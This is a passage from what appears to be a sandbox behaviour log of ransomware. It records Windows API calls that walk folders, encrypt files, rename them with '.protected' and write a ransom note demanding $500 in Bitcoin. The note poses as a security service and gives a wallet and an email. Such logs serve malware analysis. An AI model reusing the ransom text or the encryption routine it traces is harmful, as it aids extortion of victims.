steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.250] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.251] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.251] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.251] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.251] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.251] CloseHandle (hObject=0xa4) returned 1 [0074.252] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="Windows") returned -1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="Program Files") returned -1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0074.252] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="System Volume Information") returned -1 [0074.252] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned 83 [0074.252] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2=".") returned 1 [0074.252] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="..") returned 1 [0074.252] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*") returned 85 [0074.252] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.253] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.253] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.253] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.253] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.253] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.253] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\.") returned 85 [0074.253] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.253] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.253] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.253] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.253] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.253] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.253] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.253] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\..") returned 86 [0074.253] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.253] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.253] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.253] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.253] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.253] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.254] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.254] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.254] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned 92 [0074.254] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.254] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.254] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*") returned 94 [0074.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.254] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.254] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.254] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.254] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.254] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.254] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\.") returned 94 [0074.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.255] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.255] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.255] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.255] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.255] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.255] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.255] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\..") returned 95 [0074.255] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.255] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.255] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Windows") returned -1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files") returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files (x86)") returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$Recycle.bin") returned 1 [0074.255] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="System Volume Information") returned 1 [0074.255] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned 115 [0074.255] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0074.255] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0074.255] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*") returned 117 [0074.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\.") returned 117 [0074.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.256] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\..") returned 118 [0074.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.256] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.256] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.256] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.256] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.257] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.257] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.257] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.257] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.257] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0074.257] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.257] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.277] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.277] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.278] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.278] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.283] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.283] CloseHandle (hObject=0xd8) returned 1 [0074.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 134 [0074.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.protected")) returned 1 [0074.285] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.285] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Windows") returned -1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files") returned 1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files (x86)") returned 1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$Recycle.bin") returned 1 [0074.304] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="System Volume Information") returned 1 [0074.304] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.304] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".protected") returned 0x0 [0074.304] lstrcmpW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.304] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.304] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.304] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.324] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.324] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0074.324] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.324] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".rar") returned 0x0 [0074.324] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0074.324] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".zip") returned 0x0 [0074.340] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.365] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.365] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.386] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.430] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.430] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.430] CloseHandle (hObject=0xd8) returned 1 [0074.431] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 151 [0074.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.protected")) returned 1 [0074.450] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.450] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.450] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 133 [0074.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.498] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.498] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.499] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.499] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0074.499] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.499] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, 